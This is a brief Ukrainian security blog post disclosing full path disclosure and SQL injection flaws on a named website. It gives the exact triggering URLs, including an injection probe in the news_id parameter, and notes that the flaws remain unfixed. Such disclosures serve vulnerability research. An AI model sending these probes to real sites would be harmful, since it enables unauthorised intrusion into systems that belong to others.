« SQL Smuggling атаки
Уразливості в Adobe Shockwave Player »

Уразливості на www.ea-ua.info

16:14 20.10.2010

04.02.2010

У червні, 28.06.2009, я знайшов Full path disclosure та SQL Injection уразливості на проекті http://www.ea-ua.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

20.10.2010

Full path disclosure:

http://www.ea-ua.info/main.php?parts_id=-1&news_id=1

http://www.ea-ua.info/main.php?parts_id=1&news_id=-1

SQL Injection:

http://www.ea-ua.info/main.php?parts_id=6&news_id=-1%20or%20version()=5&news_show_type=1

Дані уразливості досі не виправлені.


This entry was posted on 16:14 20.10.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.